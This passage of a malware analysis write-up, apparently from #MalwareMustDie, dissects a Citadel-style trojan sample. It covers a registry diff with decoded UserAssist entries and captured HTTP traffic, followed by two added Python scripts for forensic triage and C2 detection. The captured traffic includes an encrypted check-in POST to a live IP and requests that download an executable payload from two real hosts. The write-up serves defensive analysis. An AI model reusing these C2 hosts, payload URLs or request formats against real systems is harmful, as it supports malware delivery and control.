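Run against the sample it reports the two firewall exceptions, the UserAssist entry decoded to `UEME_RUNPATH:C:\Documents and Settings\rik\デスクトップ\update_flash_player.exe`, the azys.exe autostart, the Temp binary that presents itself as "Windows TaskManager", and the Sufyil value that decodes to the Base64 string `a1hbjD4OKTcehU0A`; the DWORD under Sufyil is passed over because no rule applies to it. Splitting on the first `": "` is what makes the parser survive paths that themselves contain colons (`C:\`, `24599:UDP`), which a naive `split(':')` would not.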
----------------------------------
Values modified:23
----------------------------------
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: 90 30 12 62 DD 7F 82 8B 16 05 C8 00 DB B4 6A A5 46 4D 70 E1 BF D3 DF C0 7F 53 19 88 0A 81 8E 16 41 0C 73 6B 8C 8D 74 B2 A2 94 6D 55 8D DC 9D 40 85 6C B0 1F B7 5F A2 35 77 97 7A D6 D7 26 EE 09 C9 06 26 2A 26 AA B5 59 51 09 CF 32 62 5B 0F 61
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: 20 96 FE 0B A2 D7 98 9E C7 C0 44 9D 8F 5B 02 79 62 CE 07 0C 38 C7 E1 A7 C3 61 66 55 B8 D2 89 FB 8C AA 14 30 8F C4 BA 33 00 08 05 78 1F 55 8D 14 8F 02 4F 97 D4 75 FF AA CA 99 B1 97 E8 8C 9B 21 79 3E D3 02 C1 54 C3 8C FE 6C 35 6F C0 C8 03 C6
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000015
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x0000002B
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesSuccessful: 0x00000008
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesSuccessful: 0x0000000C
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\Count: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\Count: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\NextInstance: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x00000027
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x0000002A
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\Count: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\Count: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\NextInstance: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x00000027
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x0000002A
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Identities\Identity Ordinal: 0x00000001
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Identities\Identity Ordinal: 0x00000002
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File1: "C:\Documents and Settings\rik\デスクトップ\001.bmp"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File1: "C:\Documents and Settings\rik\デスクトップ\002.bmp"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU\MRUList: "a"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU\MRUList: "ab"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\MRUList: "a"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\MRUList: "cba"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\bmp\MRUList: "a"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\bmp\MRUList: "ba"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\MRUListEx: 00 00 00 00 FF FF FF FF
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\MRUListEx: 01 00 00 00 00 00 00 00 FF FF FF FF
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.bmp\MRUListEx: 00 00 00 00 FF FF FF FF
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.bmp\MRUListEx: 01 00 00 00 00 00 00 00 FF FF FF FF
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 01 00 00 00 15 00 00 00 30 58 95 5D 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 01 00 00 00 19 00 00 00 D0 F5 A2 C6 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 01 00 00 00 2F 00 00 00 20 13 9A 5D 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 01 00 00 00 35 00 00 00 60 65 CB C6 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:ペイント.yax: 01 00 00 00 06 00 00 00 B0 96 90 4F 1C AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:ペイント.yax: 01 00 00 00 07 00 00 00 D0 F5 A2 C6 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\JVAQBJF\flfgrz32\zfcnvag.rkr: 01 00 00 00 06 00 00 00 40 E8 BD 4F 1C AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\JVAQBJF\flfgrz32\zfcnvag.rkr: 01 00 00 00 07 00 00 00 60 65 CB C6 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 05 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 90 F5 57 C9 7B A4 CD 01 01 00 00 00 C0 A8 07 54 00 00 00 00 00 00 00 00
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 06 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 90 F5 57 C9 7B A4 CD 01 01 00 00 00 C0 A8 07 54 00 00 00 00 00 00 00 00
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 00 00 00 00 02 00 00 00 01 00 00 00 FF FF FF FF
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 01 00 00 00 02 00 00 00 00 00 00 00 FF FF FF FF
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\SessionInformation\ProgramCount: 0x00000004
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\SessionInformation\ProgramCount: 0x00000006
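Most of the 23 modified values above are sandbox noise rather than the trojan: the RNG seed, prefetch counters, kmixer enumeration, the Paint MRU (001.bmp / 002.bmp are the analyst's screenshots) and the UserAssist counters. The UserAssist names are ROT13-encoded (HRZR_EHACNGU is UEME_RUNPATH, P:\JVAQBJF\flfgrz32\zfcnvag.rkr is C:\WINDOWS\system32\mspaint.exe) and each 16-byte value is a session DWORD, a run-count DWORD and a FILETIME of the last run, so the timestamps let you line the registry diff up against the HTTP timeline below. The script that follows is an added example, not part of this write-up; it assumes the Windows XP UserAssist layout (run counter stored offset by 5) and is fed a handful of lines copied verbatim from the diff above as its constructed input.

```python
"""Pair the before/after lines of the "Values modified" diff and decode
the UserAssist entries (ROT13 name, session / run count / FILETIME).

Added example, not the original #MalwareMustDie code. Assumes the XP
UserAssist value layout: <IIQ = session, count (+5 offset), FILETIME.
"""
import codecs
import re
import struct
from datetime import datetime, timedelta, timezone

# Constructed sample: lines copied verbatim from the diff above (one prefetch
# counter pair, which is plain system noise, plus two UserAssist pairs).
SAMPLE = r"""
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000015
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x0000002B
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 01 00 00 00 15 00 00 00 30 58 95 5D 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 01 00 00 00 19 00 00 00 D0 F5 A2 C6 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\JVAQBJF\flfgrz32\zfcnvag.rkr: 01 00 00 00 06 00 00 00 40 E8 BD 4F 1C AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\JVAQBJF\flfgrz32\zfcnvag.rkr: 01 00 00 00 07 00 00 00 60 65 CB C6 1D AC CD 01
"""

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
USERASSIST_RE = re.compile(r"\\UserAssist\\\{[0-9A-Fa-f-]+\}\\Count\\(.+)$")
HEX_BYTES_RE = re.compile(r"(?:[0-9A-Fa-f]{2} ?)+")


def parse_diff(text):
    """Group the diff's `key: value` lines into {key: [old, new]}.

    The value separator is the LAST ': ' on the line, because UserAssist
    names such as 'HRZR_EHACNGU:P:\\...' contain colons themselves.
    """
    pairs = {}
    for line in text.splitlines():
        if ": " not in line:
            continue
        key, value = line.rsplit(": ", 1)
        pairs.setdefault(key, []).append(value)
    return pairs


def decode_userassist(key, value):
    """Decode one UserAssist Count value; None if the key/value is not one."""
    m = USERASSIST_RE.search(key)
    if not m or not HEX_BYTES_RE.fullmatch(value):
        return None
    raw = bytes.fromhex(value)          # fromhex ignores the spaces
    if len(raw) != 16:                  # XP layout only (assumption)
        return None
    session, count, filetime = struct.unpack("<IIQ", raw)
    return {
        "program": codecs.decode(m.group(1), "rot_13"),  # non-ASCII passes through
        "session": session,
        "runs": count - 5,              # XP stores the counter offset by 5
        "last_run": FILETIME_EPOCH + timedelta(microseconds=filetime // 10),
    }


def triage(text):
    """Return before/after decodes of every UserAssist entry in the diff."""
    out = []
    for key, values in parse_diff(text).items():
        decoded = [decode_userassist(key, v) for v in values]
        if decoded and all(decoded):
            out.append({"key": key, "program": decoded[0]["program"],
                        "before": decoded[0], "after": decoded[-1]})
    return out


if __name__ == "__main__":
    for e in triage(SAMPLE):
        b, a = e["before"], e["after"]
        print(f'{e["program"]}: runs {b["runs"]} -> {a["runs"]}, '
              f'last run {b["last_run"]:%H:%M:%S} -> {a["last_run"]:%H:%M:%S} UTC')
```

On the diff above this resolves the mspaint.exe entry to one run at 04:03 UTC and a second at 04:13 UTC on 2012-10-17, i.e. the analyst taking screenshots in the same minutes the GET /Z2U.exe download (04:13:17 GMT) went out; the only persistence-relevant registry change in this section is the Sufyil key in the "Values added" part, not anything in the modified list.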
==============================================
EVIL NETWORK CONNECTIVITIES..............
==============================================
(1)POST /forum/viewtopic.php HTTP/1.0
Host: 108.178.59.34
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 255
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
CRYPTED0.....?E..+..?X.Q...M.....i....fx....F.hp.q.....2.=B
..*..8..EA`....sj[.....O...2.#Ic.4H..BE...s..$.i.,X.....o.U
..5....GCP..7=.Jt.vpq5o.+.....)u(....?.$....`...O...u.n....
...V.....+Y.u .{..}X?V.h..x.....*.5.Gy.(...>)..1....@.B.B..;
=C.f..<.\......B.*
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 17 Oct 2012 04:17:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.14-1~dotdeb.0
-----------
(2)GET /Z2U.exe HTTP/1.0
Host: 3073.a.hostable.me
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP/1.1 200 OK
Date: Wed, 17 Oct 2012 04:13:17 GMT
Server: Apache
Last-Modified: Wed, 17 Oct 2012 04:10:03 GMT
Accept-Ranges: bytes
Content-Length: 407128
Connection: close
Content-Type: application/x-msdownload
MZ......................@..........................................
.....!..L.!This program cannot be run in DOS mode.
$.......PE..L...
----------------------------------------
(3)GET /PNV3Hbi.exe HTTP/1.0
Host: 85.18.21.252
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP/1.1 200 OK
Date: Wed, 17 Oct 2012 04:09:24 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Wed, 17 Oct 2012 04:06:07 GMT
ETag: "242fca-63658-4cc3963d6a094"
Accept-Ranges: bytes
Content-Length: 407128
Connection: close
Content-Type: application/x-msdos-program
MZ......................@...............................................!
This program cannot be run in DOS mode.$.......PE..L....(~P..............
.Z....................@.......................... ......................
......................................................................U..
..E..M.....E..U..E..M...A.U..E..E..M.....U..E...]...U......E..E..M..M..E.
.E......E...]....U...E.P.M.Q.U.R.|......]........U..Q.E.."...E.."...E..".
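Three things in the exchanges above are worth turning into detection logic: the POST body to 108.178.59.34 starts with the literal CRYPTED0, every request carries the same fixed User-Agent "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" on an XP victim, and the two EXE downloads from different hosts have the identical Content-Length 407128, which suggests one dropped binary mirrored in two places (only hashing both bodies proves it). The script below is an added example, not code from this write-up; it re-types the three exchanges as constructed raw HTTP with the bodies cut to the bytes the dump shows, and the alert names and the choice to key on the UA string and the CRYPTED0 prefix are this example's own.

```python
"""Triage a captured HTTP session for Citadel-style C2 and payload pulls.

Added example, not the original #MalwareMustDie code. The exchanges are
constructed from the headers shown above; bodies are truncated stand-ins.
"""
from collections import defaultdict

BOT_UA = "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"
EXE_TYPES = {"application/x-msdownload", "application/x-msdos-program"}

# Constructed sample: (request, response) pairs re-typed from the dump above.
EXCHANGES = [
    (b"POST /forum/viewtopic.php HTTP/1.0\r\nHost: 108.178.59.34\r\nAccept: */*\r\n"
     b"Accept-Encoding: identity, *;q=0\r\nContent-Length: 255\r\nConnection: close\r\n"
     b"Content-Type: application/octet-stream\r\nContent-Encoding: binary\r\n"
     b"User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)\r\n\r\n"
     b"CRYPTED0\x00\x05\x45\x00",                       # stand-in body
     b"HTTP/1.1 200 OK\r\nServer: nginx/0.7.67\r\nDate: Wed, 17 Oct 2012 04:17:15 GMT\r\n"
     b"Content-Type: text/html\r\nConnection: close\r\n"
     b"X-Powered-By: PHP/5.3.14-1~dotdeb.0\r\n\r\n"),
    (b"GET /Z2U.exe HTTP/1.0\r\nHost: 3073.a.hostable.me\r\nAccept: */*\r\n"
     b"Accept-Encoding: identity, *;q=0\r\nConnection: close\r\n"
     b"User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)\r\n\r\n",
     b"HTTP/1.1 200 OK\r\nDate: Wed, 17 Oct 2012 04:13:17 GMT\r\nServer: Apache\r\n"
     b"Content-Length: 407128\r\nConnection: close\r\n"
     b"Content-Type: application/x-msdownload\r\n\r\nMZ\x90\x00\x03\x00"),
    (b"GET /PNV3Hbi.exe HTTP/1.0\r\nHost: 85.18.21.252\r\nAccept: */*\r\n"
     b"Accept-Encoding: identity, *;q=0\r\nConnection: close\r\n"
     b"User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)\r\n\r\n",
     b"HTTP/1.1 200 OK\r\nDate: Wed, 17 Oct 2012 04:09:24 GMT\r\n"
     b"Server: Apache/2.2.22 (Debian)\r\nContent-Length: 407128\r\nConnection: close\r\n"
     b"Content-Type: application/x-msdos-program\r\n\r\nMZ\x90\x00\x03\x00"),
]


def parse_http(raw):
    """Split a raw HTTP message into (start line, {header: value}, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def assess(request, response):
    """Per-exchange checks; returns the IOC fields plus a list of alert names."""
    req_line, req_h, req_body = parse_http(request)
    _, rsp_h, rsp_body = parse_http(response)
    method, uri, _ = req_line.split(" ", 2)
    f = {"host": req_h.get("host"), "method": method, "uri": uri,
         "length": rsp_h.get("content-length"), "alerts": []}
    # Check-in: POST whose body opens with the CRYPTED0 marker seen above.
    if method == "POST" and req_body.startswith(b"CRYPTED0"):
        f["alerts"].append("crypted0-checkin")
    # The bot hardcodes a Win98/IE5 UA; on an XP host that string is a tell.
    if req_h.get("user-agent") == BOT_UA:
        f["alerts"].append("hardcoded-legacy-ua")
    # Payload pull: executable Content-Type or an MZ body, whichever is present.
    if rsp_h.get("content-type") in EXE_TYPES or rsp_body.startswith(b"MZ"):
        f["alerts"].append("pe-download")
    return f


def assess_session(exchanges):
    """Run per-exchange checks, then the cross-exchange mirrored-payload check."""
    findings = [assess(q, r) for q, r in exchanges]
    hosts_by_len = defaultdict(set)
    for f in findings:
        if "pe-download" in f["alerts"] and f["length"]:
            hosts_by_len[f["length"]].add(f["host"])
    for f in findings:
        # Same byte count served by two hosts: probably one binary mirrored.
        if len(hosts_by_len.get(f["length"], ())) > 1:
            f["alerts"].append("mirrored-payload")
    return findings


if __name__ == "__main__":
    for f in assess_session(EXCHANGES):
        print(f'{f["method"]} {f["host"]}{f["uri"]} len={f["length"]} -> {f["alerts"]}')
```

The same four checks translate directly into proxy or IDS content matches (UA string, "CRYPTED0" at offset 0 of a POST body, executable MIME types, MZ at the start of a response body); the mirrored-payload hint is only a pivot for hashing the two captured files, not a verdict.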
#MalwareMustDie!!!!!!!!!